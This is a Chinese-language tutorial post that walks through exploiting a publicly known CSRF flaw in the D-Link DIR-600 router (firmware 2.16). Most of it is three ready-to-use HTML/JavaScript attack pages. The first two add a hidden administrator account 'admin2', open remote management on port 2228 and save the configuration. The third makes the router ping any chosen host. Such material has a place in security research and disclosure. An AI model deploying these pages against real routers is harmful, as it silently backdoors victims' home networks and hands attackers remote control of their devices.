1,介绍
本文的目的是展示csrf漏洞的危害,以d-link的dir-600路由器(硬件版本:bx,固件版本:2.16)的csrf漏洞为例。
d-link的csrf漏洞已经是公开的,本文将详细描述一下整个d-link csrf漏洞的利用,如何通过csrf漏洞实现远程管理访问d-link路由器。
2,csrf漏洞说明
如果某些request请求中没有csrf token或不需要密码授权,会存在csrf漏洞,该漏洞允许攻击者伪造登录用户发送请求,因此可以导致用户执行攻击者想要的操作请求。
通过d-link 管理面板的csrf漏洞,攻击者可以做以下操作:
@1,添加一个新的管理帐号;
@2,启用路由器的远程管理;
@3,ping特定的机器;此操作只需要登录路由器就可以实现,需要知道路由器的wan ip地址。
3,part1:给路由器增加一个新的管理帐号
需要两个request请求来完成
request1:
<html>
<body>
<script>
function submitrequest()
{
var xhr = new xmlhttprequest();
xhr.open("post", "http://192.168.0.1/hedwig.cgi", true);
xhr.setrequestheader("accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setrequestheader("accept-language", "en-us,en;q=0.5");
xhr.setrequestheader("content-type", "text/plain; charset=utf-8");
xhr.withcredentials = "true";
var body = "<?xml version=\"1.0\" encoding=\"utf-8\" ?>"+
"
<postxml>"+
"<module>"+
"<service>device.account</service>"+
"<device>"+
"<account>"+
"<seqno/>"+
"<max>1</max>"+
"<count>2</count>"+
"<entry>"+
"<name>admin</name>"+
"
<password>==ooxxggyy==</password>"+
"<group>0</group>"+
"<description/>"+
"</entry>"+
"<entry>"+
"<name>admin2</name>"+
"
<password>pass2</password>"+
"<group>0</group>"+
"<description/>"+
"</entry>"+
"</account>"+
"<session>"+
"<captcha>0</captcha>"+
"<dummy/>"+
"<timeout>180</timeout>"+
"<maxsession>128</maxsession>"+
"<maxauthorized>16</maxauthorized>"+
"</session>"+
"</device>"+
"</module>"+
"<module>"+
"<service>http.wan-1</service>"+
"<inf>"+
"<web>2228</web>"+
"<weballow>"+
"<hostv4ip/>"+
"</weballow>"+
"</inf>"+
"</module>"+
"<module>"+
"<service>http.wan-2</service>"+
"<inf>"+
"<web>2228</web>"+
"<weballow>"+
"<hostv4ip/>"+
"</weballow>"+
"</inf>"+
"</module>"+
"</postxml>";
xhr.send(body);
}
</script>
<form action="#">
<input type="button" value="submit request1" onclick="submitrequest();" />
</form>
</body>
</html>
request2:
<html>
<body>
<script>
function submitrequest()
{
var xhr = new xmlhttprequest();
xhr.open("post", "http://192.168.0.1/pigwidgeon.cgi", true);
xhr.setrequestheader("accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setrequestheader("accept-language", "en-us,en;q=0.5");
xhr.setrequestheader("content-type", "application/x-www-form-urlencoded; charset=utf-8");
xhr.withcredentials = "true";
var body = "actions=setcfg%2csave%2cactivate";
xhr.send(body);
}
</script>
<form action="#">
<input type="button" value="submit request2" onclick="submitrequest();" />
</form>
</body>
</html>
request1和request2中,默认的路由局域网ip地址是192.198.0.1,管理帐号是admin,request1中的request请求中,当密码字段为==ooxxggyy==的时候,是不会修改admin帐号的密码的。这两个请求完成了管理帐号admin2的添加,同时启用了远程管理端口2228.
part2:ping特定的主机
request3:
<html>
<body>
<script>
function submitrequest()
{
var xhr = new xmlhttprequest();
xhr.open("post", "http://192.168.0.1/diagnostic.php", true);
xhr.setrequestheader("accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setrequestheader("accept-language", "en-us,en;q=0.5");
xhr.setrequestheader("content-type", "application/x-www-form-urlencoded; charset=utf-8");
xhr.withcredentials = "true";
var body = "act=ping&dst=x.y.z.w";
xhr.send(body);
}
</script>
<form action="#">
<input type="button" value="submit request3" onclick="submitrequest();" />
</form>
</body>
</html>
只需要求该代码中的x.y.z.w为你需要ping的主机ip地址就可以。
如对本文有疑问,
点击进行留言回复!!
我要评论
网友评论